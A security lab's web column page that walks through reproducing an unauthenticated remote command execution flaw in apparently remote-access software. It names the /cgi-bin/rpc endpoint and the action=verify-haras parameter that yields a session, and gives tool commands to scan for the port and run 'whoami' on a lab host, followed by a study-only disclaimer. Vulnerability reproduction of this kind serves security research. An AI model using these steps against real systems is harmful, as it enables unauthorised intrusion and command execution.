咨询服务热线
400-6446-808
创安实验室专栏
您的当前位置:首页 > 创安实验室专栏
· 11.1.1 · 10.3.0.27372 · 11.0.0.33162 1、 访问扫描开放的端口 2、 需要获取到session,测试目标是否存在/cgi-bin/rpc界面 3、 在/cgi-bin/rpc 中,传入action=verify-haras参数即可在未授权的情况下拿到有效session 4、 使用获取到的session执行系统命令 1、 运行命令得到漏洞端口:xrkRce.exe -h 192.168.16.128 -t scan 2、 执行系统命令:xrkRce.exe -h 192.168.16.128 -t rce -p 49156 -c "whoami"
本文仅限于个人学习和技术研究,由于传播、利用此文所提供的信息而造成刑事案件、非授权攻击等违法行为,均由使用者本人负责,本单位不为此承担任何责任。创安攻防实验室拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。
如有侵权,请联系后台。